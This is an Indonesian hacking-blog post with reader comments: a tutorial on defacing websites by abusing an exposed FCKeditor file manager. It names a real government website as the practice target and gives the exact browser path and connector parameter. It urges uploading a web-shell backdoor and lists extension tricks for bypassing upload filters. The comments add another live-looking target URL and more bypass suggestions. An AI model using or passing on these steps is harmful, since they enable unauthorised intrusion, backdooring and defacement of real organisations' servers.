Thursday, 21 May 2015

Tutorial Eksekusi Deface dengan FCKeditor Simple

hehehe, selamat malam sobat.
Nuenomaru disini .-.
Kali ini Nue akan menjelaskan tentang How to Executed Exploit FCKeditor (Nnjjirr inggris pisan :v )
lagi maen maen ke forum INCEF nemu thread keren nih.
Author: Mr.DellatioNx196

Pertama Siapkan Target dulu Sebagai Kelinci Percobaan ~ 

Dork : Use Your Imajinasi bro


Target Sebagai Kelinci Percobaan ~> http://agricenter.jogjaprov.go.id/

Lalu Kita Cari Letak ~ FCKeditor - Resources Browser ~ nya 

Letaknya di ~ 

www.target.crotz/path/editor/filemanager/browser/default/browser.html
*path bisa diganti sesuaikan dengan dork yang sobat gunakan.


Jadinya ~ 

http://agricenter.jogjaprov.go.id/includes/phpEasyAdmin/form/textarea/editor/filemanager/browser/default/browser.html  

Nanti akan Terlihat Seperti ini ~




Sekarang, coba Tambahkan ini dibagian Akhir URL nya ~ 

?Connector=connectors/php/connector.php

Jadinya Seperti ini ~

http://agricenter.jogjaprov.go.id/includes/phpEasyAdmin/form/textarea/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

~ Nanti Akan Terlihat File2 ada Disitu Seperti ini

Lalu Sekarang Tinggal Upload File Kamu ~



Bisa Juga Upload Shell backd00r ~

Bypass Shell xhell.cer , xhell.ink , xhell;php;.pfla , xhell;pd;php;.gif , xhell;.php5 , xhell.exe

~ Kalau Sudah Terupload nanti Akan Terlihat File Kamu disitu



File Acces ? ? ?

Gampang ~ Tinggal Klik kanan di File kamu yang tadi Sudah Terupload ~ Lalu , Periksa Element

Jika Sudah Tinggal Panggil Deh ~ 

http://agricenter.jogjaprov.go.id/images/File/nuenomaru.html


Oke Sudah Kan ? Simple

Semoga Bermanfaat Tutor Simple ini

maaf kalo agak cupu, dan bila ada kesalahan mohon dimaafkan [Image: bacol.gif]


Source and Thanks to: Forum INCEF

Linux is Sexy [Image: bacol.gif]
root@nuenomaru~president:~#apt-get install WanitaJepang [Image: bacol.gif]



./Nuenomaru


Nuenomaru just an illusion in Cyber World




Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

16 comments

Mantap gan
bw gan http://mr404-security.blogspot.co.id

xixixhi yoks >.<
thanks ^^

salam sukses

Nuenomaru

Saran ane gan , ente upload aja dork nya biar lebih tau :)
#salam #SkyNet

terimakasih sarannya >.<"
tpi banyak tutor di blog sini, yg selalu menyertakan dork kok.
utk ini, nanti kena gangbang gan >.<"

#Nuenomaru

Mantap gan postingan nya.. sangat membantu..

Jangan lupa mampir di blog sy gan

http://duniahackgsh.blogspot.com

gmna kalo selalu muncul kek error xml gtu gan......??

sipp , BW done yaw kaka

#Nuenomaru

http://www.unipo.sk/public/js/admin/FCKeditor/editor/filemanager/browser/default/browser.html <<<<<<<<

gan kalo boleh share dong cara bypass extensi upload shell di responsive filemanager :D
Thx

hahah kemungkinan gak vuln om

#Nuenomaru

hahaha silahkan di coba sendiri aje om..
php2.html, atau apa kek wkkww..

#Nuenomaru

cuma contoh:
/editor/filemanager/browser/default/browser.html

hahah oprek2 aje om,, ini exploit ane kurang paham dorknye

emang ane gak bisa maenin dork om ehhe

#Nuenomaru

mampir juga ya di blog saya :)
https://komputer-dan-android.blogspot.co.id/


EmoticonEmoticon